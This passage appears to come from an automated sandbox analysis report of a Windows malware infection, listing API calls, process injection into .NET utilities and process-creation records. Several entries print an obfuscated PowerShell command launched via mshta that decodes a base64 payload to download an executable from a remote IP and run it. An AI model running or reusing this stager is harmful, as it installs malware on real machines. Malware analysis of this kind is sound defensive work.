            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,25_2_0040BB30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,25_2_0040BD37
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,25_2_00407C97
            Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 11_2_000000013FDE26B0 GetSystemInfo,GetNumaHighestNodeNumber,GetCurrentProcess,GetProcessGroupAffinity,GetLastError,GetCurrentProcess,GetProcessAffinityMask,11_2_000000013FDE26B0
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: winiti.exe, 0000000B.00000002.451651795.000000013FF6B000.00000002.00000001.01000000.0000000B.sdmp, winiti.exe, 0000000B.00000000.447217263.000000013FF6B000.00000002.00000001.01000000.0000000B.sdmp, winiti.exe, 0000000B.00000002.451807346.0000000143000000.00000004.00001000.00020000.00000000.sdmp, winiti.exe, 00000016.00000002.484524464.0000000142800000.00000004.00001000.00020000.00000000.sdmp, winiti.exe, 00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmp, winiti.exe, 00000016.00000000.481803220.000000013F78B000.00000002.00000001.01000000.0000000B.sdmp, winiti.exe.7.dr, csrss[1].exe.7.drBinary or memory string: qEMutating a value collection derived from a dictionary is not allowed.Y
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,25_2_004349F9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,25_2_0041CB50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_004432B5 mov eax, dword ptr fs:[00000030h]25_2_004432B5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_00412077 GetProcessHeap,HeapFree,25_2_00412077
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 11_2_000000013FDD5760 RtlAddVectoredExceptionHandler,11_2_000000013FDD5760
            Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 11_2_000000013FE39A88 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_000000013FE39A88
            Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 22_2_000000013F5F5760 RtlAddVectoredExceptionHandler,22_2_000000013F5F5760
            Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 22_2_000000013F659A88 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,22_2_000000013F659A88
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_00434B47 SetUnhandledExceptionFilter,25_2_00434B47
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,25_2_004349F9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,25_2_0043BB22
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,25_2_00434FDC

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Allocates memory in foreign processes
            Source: C:\Users\user\AppData\Roaming\winiti.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\AppData\Roaming\winiti.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\AppData\Roaming\winiti.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 protect: page execute and read and writeJump to behavior
            Injects a PE file into a foreign processes
            Source: C:\Users\user\AppData\Roaming\winiti.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\AppData\Roaming\winiti.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\AppData\Roaming\winiti.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5AJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\AppData\Roaming\winiti.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\winiti.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 401000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\winiti.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 459000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\winiti.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 471000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\winiti.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 477000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\winiti.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 478000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\winiti.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 479000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\winiti.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 47E000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\winiti.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 7EFDE008Jump to behavior
            Source: C:\Users\user\AppData\Roaming\winiti.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\winiti.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\winiti.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 459000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\winiti.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 471000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\winiti.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 477000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\winiti.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 478000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\winiti.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 479000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\winiti.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 47E000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\winiti.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\winiti.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 401000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\winiti.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 459000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\winiti.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 471000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\winiti.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 477000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\winiti.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 478000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\winiti.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 479000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\winiti.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 47E000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\winiti.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 7EFDE008Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe25_2_004120F7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_00419627 mouse_event,25_2_00419627
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'JDF6SUdOc3cgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYmVyZGVmaU5JVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByTVh2eVRsVnFGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBQQ2csdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrRnZHWHFFdGdOLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIeCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUFqVFB0cCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQxeklHTnN3OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3My4xNDMuNDYvVDI1MDdGL2NzcnNzLmV4ZSIsIiRFbnY6QVBQREFUQVx3aW5pdGkuZXhlIiwwLDApO1N0QXJULXNMZUVwKDMpO3NUQVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2luaXRpLmV4ZSI='+[CHAr]34+'))')))"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'JDF6SUdOc3cgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYmVyZGVmaU5JVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByTVh2eVRsVnFGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBQQ2csdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrRnZHWHFFdGdOLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIeCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUFqVFB0cCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQxeklHTnN3OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3My4xNDMuNDYvVDI1MDdGL2NzcnNzLmV4ZSIsIiRFbnY6QVBQREFUQVx3aW5pdGkuZXhlIiwwLDApO1N0QXJULXNMZUVwKDMpO3NUQVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2luaXRpLmV4ZSI='+[CHAr]34+'))')))"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ofvwqfjd\ofvwqfjd.cmdline"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\winiti.exe "C:\Users\user\AppData\Roaming\winiti.exe" Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC41B.tmp" "c:\Users\user\AppData\Local\Temp\ofvwqfjd\CSC42CCF8E8871B428699CAD148D9BC26FF.TMP"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\winiti.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"Jump to behavior
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'JDF6SUdOc3cgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYmVyZGVmaU5JVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByTVh2eVRsVnFGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBQQ2csdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrRnZHWHFFdGdOLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIeCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUFqVFB0cCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQxeklHTnN3OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3My4xNDMuNDYvVDI1MDdGL2NzcnNzLmV4ZSIsIiRFbnY6QVBQREFUQVx3aW5pdGkuZXhlIiwwLDApO1N0QXJULXNMZUVwKDMpO3NUQVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2luaXRpLmV4ZSI='+[CHAr]34+'))')))"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'JDF6SUdOc3cgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYmVyZGVmaU5JVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByTVh2eVRsVnFGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBQQ2csdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrRnZHWHFFdGdOLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIeCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUFqVFB0cCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQxeklHTnN3OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3My4xNDMuNDYvVDI1MDdGL2NzcnNzLmV4ZSIsIiRFbnY6QVBQREFUQVx3aW5pdGkuZXhlIiwwLDApO1N0QXJULXNMZUVwKDMpO3NUQVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2luaXRpLmV4ZSI='+[CHAr]34+'))')))"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ge3s1wmx\ge3s1wmx.cmdline"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\winiti.exe "C:\Users\user\AppData\Roaming\winiti.exe"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC9F.tmp" "c:\Users\user\AppData\Local\Temp\ge3s1wmx\CSCB36078EA61014130AC1261969F8319D.TMP"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\winiti.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\winiti.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]34+'jdf6sudoc3cgicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicbhzeqtdflwrsagicagicagicagicagicagicagicagicagicagicatbuvnymvyzgvmau5jvelvbiagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidxjsbw9uiiwgicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicbytvh2evrsvnfglhn0cmluzyagicagicagicagicagicagicagicagicagicagicbvlhn0cmluzyagicagicagicagicagicagicagicagicagicagicbqq2csdwludcagicagicagicagicagicagicagicagicagicagicbrrnzhwhffdgdoleludfb0ciagicagicagicagicagicagicagicagicagicagicbieck7jyagicagicagicagicagicagicagicagicagicagicattkfnrsagicagicagicagicagicagicagicagicagicagicaizgiiicagicagicagicagicagicagicagicagicagicagic1oqw1lu3bhy2ugicagicagicagicagicagicagicagicagicagicageufqvfb0ccagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicqxeklhtnn3ojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmta3lje3my4xndmundyvvdi1mddgl2nzcnnzlmv4zsisiirfbny6qvbqrefuqvx3aw5pdgkuzxhliiwwldapo1n0qxjulxnmzuvwkdmpo3nuqvjuicagicagicagicagicagicagicagicagicagicagicikrw5wokfquerbvefcd2luaxrplmv4zsi='+[char]34+'))')))"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]34+'jdf6sudoc3cgicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicbhzeqtdflwrsagicagicagicagicagicagicagicagicagicagicatbuvnymvyzgvmau5jvelvbiagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidxjsbw9uiiwgicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicbytvh2evrsvnfglhn0cmluzyagicagicagicagicagicagicagicagicagicagicbvlhn0cmluzyagicagicagicagicagicagicagicagicagicagicbqq2csdwludcagicagicagicagicagicagicagicagicagicagicbrrnzhwhffdgdoleludfb0ciagicagicagicagicagicagicagicagicagicagicbieck7jyagicagicagicagicagicagicagicagicagicagicattkfnrsagicagicagicagicagicagicagicagicagicagicaizgiiicagicagicagicagicagicagicagicagicagicagic1oqw1lu3bhy2ugicagicagicagicagicagicagicagicagicagicageufqvfb0ccagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicqxeklhtnn3ojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmta3lje3my4xndmundyvvdi1mddgl2nzcnnzlmv4zsisiirfbny6qvbqrefuqvx3aw5pdgkuzxhliiwwldapo1n0qxjulxnmzuvwkdmpo3nuqvjuicagicagicagicagicagicagicagicagicagicagicikrw5wokfquerbvefcd2luaxrplmv4zsi='+[char]34+'))')))"
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]34+'jdf6sudoc3cgicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicbhzeqtdflwrsagicagicagicagicagicagicagicagicagicagicatbuvnymvyzgvmau5jvelvbiagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidxjsbw9uiiwgicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicbytvh2evrsvnfglhn0cmluzyagicagicagicagicagicagicagicagicagicagicbvlhn0cmluzyagicagicagicagicagicagicagicagicagicagicbqq2csdwludcagicagicagicagicagicagicagicagicagicagicbrrnzhwhffdgdoleludfb0ciagicagicagicagicagicagicagicagicagicagicbieck7jyagicagicagicagicagicagicagicagicagicagicattkfnrsagicagicagicagicagicagicagicagicagicagicaizgiiicagicagicagicagicagicagicagicagicagicagic1oqw1lu3bhy2ugicagicagicagicagicagicagicagicagicagicageufqvfb0ccagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicqxeklhtnn3ojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmta3lje3my4xndmundyvvdi1mddgl2nzcnnzlmv4zsisiirfbny6qvbqrefuqvx3aw5pdgkuzxhliiwwldapo1n0qxjulxnmzuvwkdmpo3nuqvjuicagicagicagicagicagicagicagicagicagicagicikrw5wokfquerbvefcd2luaxrplmv4zsi='+[char]34+'))')))"
